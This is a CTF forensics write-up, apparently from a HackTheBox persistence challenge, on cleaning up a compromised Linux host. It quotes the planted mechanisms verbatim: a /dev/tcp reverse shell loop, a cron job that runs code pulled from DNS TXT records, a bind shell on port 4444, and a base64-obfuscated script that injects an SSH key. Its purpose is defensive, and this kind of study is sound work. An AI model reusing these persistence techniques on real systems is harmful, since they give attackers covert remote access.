HackMD - Collaborative Markdown Knowledge Base

### sufficient: the gnats user There exists no gnats package nor such a file. The users has a bash login and a password in `/etc/shadow`. We disable the user by replacing the `6`-hash with a star `*` and also change the login shell in `/etc/passwd` to `nologin`. ``` gnats:$6$SLVgdKJw4kQ5L0bv$ODjJstI50dhKq/IPbmLiZyJpcIPkifIUJGsQ.4f9EguBzf5JeI4sswDo9DsGZ39CDHP8h5AnnSNW5wgi7GeLZ.:18761:0:99999:7::: ``` Also make sure to set the correct group to gnats. He has the group-id `0`. - Remove hash from `/etc/shadow` - Remove gid `0` for user gnats in `/etc/passwd` ### sufficient: find cron job which executes DNS requests responses ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# crontab -u user -l * * * * * /bin/sh -c "sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)" ``` Remove this by executing the following line and remove the cronjob from: ``` crontab -u user -e ``` ### sufficient: `connectivity check` spawns shells ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2616 68 ? Ss 18:02 0:00 /bin/sh -c /usr/sbin/sshd -D -p 23 root 7 0.0 0.0 12184 928 ? S 18:02 0:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups root 18 0.0 0.0 3984 1528 ? S 18:02 0:00 /bin/bash /var/lib/private/connectivity-check root 47 0.0 0.0 3984 1452 ? S 18:03 0:00 /bin/bash /var/lib/private/connectivity-check ``` When inspecting the file `connectivity-check`, we find: ```bash #!/bin/bash while true; do nohup bash -i >& /dev/tcp/172.17.0.1/443 0>&1; sleep 10; done ``` Checking which parent process starts the connectivity-check: ```bash root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# ps -efj UID PID PPID PGID SID C STIME TTY TIME CMD root 1 0 1 1 0 18:02 ? 00:00:00 /bin/sh -c /usr/sbin/sshd -D -p 23 root 7 1 1 1 0 18:02 ? 00:00:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups root 325 1 315 315 0 18:27 ? 00:00:00 /bin/bash /var/lib/private/connectivity-check root 393 1 382 382 0 18:30 ? 00:00:00 /bin/bash /var/lib/private/connectivity-check ``` It's the sshd. Within the configuration we didnt find anything. But after greping within `/etc` we found somethign: ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# grep -Hrn connec /etc/ /etc/sysctl.d/10-ptrace.conf:4:# credentials that exist in memory (re-using existing SSH connections, /etc/update-motd.d/30-connectivity-check:3:nohup /var/lib/private/connectivity-check & ``` The `update-motd.d/30-connectivity-check` file: ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# cat /etc/update-motd.d/30-connectivity-check #!/bin/bash nohup /var/lib/private/connectivity-check & ``` - Delete the file `/var/lib/private/connectivity-check` - Delete the file `/etc/update-motd.d/30-connectivity-check` - Turn all motd off: `chmod -x /etc/update-motd.d/` - Kill all those processes ### sufficient: ``~/.bashrc` from user root contains following lines on 4444/tcp listens a alertd service ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# netstat -tulpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 7/sshd: /usr/sbin/s tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 202/alertd tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 177/alertd tcp6 0 0 :::23 :::* LISTEN 7/sshd: /usr/sbin/s ``` ``` # Add an "alert" alias for long running commands. Use like so: # sleep 10; alert alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"' alertd -e /bin/bash -lnp 4444 & ``` Googling the md5sum `2286f0526e891796a638f3c600d86a38` ![](https://hackmd.io/_uploads/SyPSuYPw3.png) - removing `alertd` - removing lines from `.bashrc` ### sufficient: suid binaries ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# find / -perm /4000 -print 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/umount /usr/bin/newgrp /usr/bin/passwd /usr/bin/su /usr/bin/chsh /usr/bin/chfn /usr/bin/mount /usr/bin/gpasswd /usr/bin/dlxcrw /usr/bin/mgxttm /usr/bin/sudo /usr/sbin/afdluk /usr/sbin/ppppd /root/solveme ``` I removed `.backdoor` before that. Then `afdluk` and `ppppd` and others that look fishy. More is less! ### change password of user passwd Changing the password of the user `passwd`. Solves: 6? ### find cron files and inspect them ``` root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# find /etc/cron* -type f /etc/cron.d/e2scrub_all /etc/cron.d/popularity-contest /etc/cron.d/.placeholder /etc/cron.d/anacron /etc/cron.daily/apt-compat /etc/cron.daily/dpkg /etc/cron.daily/access-up /etc/cron.daily/pyssh /etc/cron.daily/bsdmainutils /etc/cron.daily/man-db /etc/cron.daily/popularity-contest /etc/cron.daily/logrotate /etc/cron.daily/0anacron /etc/cron.daily/.placeholder /etc/cron.hourly/.placeholder /etc/cron.monthly/0anacron /etc/cron.monthly/.placeholder /etc/cron.weekly/man-db /etc/cron.weekly/0anacron /etc/cron.weekly/.placeholder /etc/crontab ``` There we find a file named `pyssh`: ```bash #!/bin/sh VER=$(python3 -c 'import ssh_import_id; print(ssh_import_id.VERSION)') MAJOR=$(echo $VER | cut -d'.' -f1) if [ $MAJOR -le 6 ]; then /lib/python3/dist-packages/ssh_import_id_update fi ``` The `pyssh` script calls `/lib/python3/dist-packages/ssh_import_id_update`: ```bash #!/bin/bash KEY=$(echo "c3NoLWVkMjU1MTkgQUFBQUMzTnphQzFsWkRJMU5URTVBQUFBSUhSZHg1UnE1K09icTY2Y3l3ejVLVzlvZlZtME5DWjM5RVBEQTJDSkRxeDEgbm9ib2R5QG5vdGhpbmcK" | base64 -d) PATH=$(echo "L3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMK" | base64 -d) /bin/grep -q "$KEY" "$PATH" || echo "$KEY" >> "$PATH" ``` When decoding the base64 encoded content: `/root/.ssh/authorized_keys` and `ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing`. Remove all three files. ### user alias auf netcat ### roots `.ssh/authorized` contains fishy authorized key: ``` ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing ``` ### `.backdoor` binary im home verzeichnis ``` user@forensicspersistence-48658-699b8c4c6f-7xxm8:~$ file ~/.backdoor /home/user/.backdoor: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a6cb40078351e05121d46daa768e271846d5cc54, for GNU/Linux 3.2.0, stripped ``` ### `bash` statt `nologin` als loginshell für user gnats in /etc/passwd User `gnats` in /etc/passwd hat /bin/bash als shell (sollte eigentlich `/usr/sbin/nologin` sein, oda?) ### it is not: - apt repositories are clean - `/etc/apt/sources.list - `permitRootLogin = yes` ungewöhnlich? ### current state: ``` root@forensicspersistence-48658-699b8c4c6f-ljwkf:~# ./solveme Issue 1 is fully remediated Issue 2 is fully remediated Issue 3 is fully remediated Issue 4 is partially remediated Issue 5 is fully remediated Issue 6 is fully remediated Issue 7 is partially remediated Issue 8 is fully remediated ```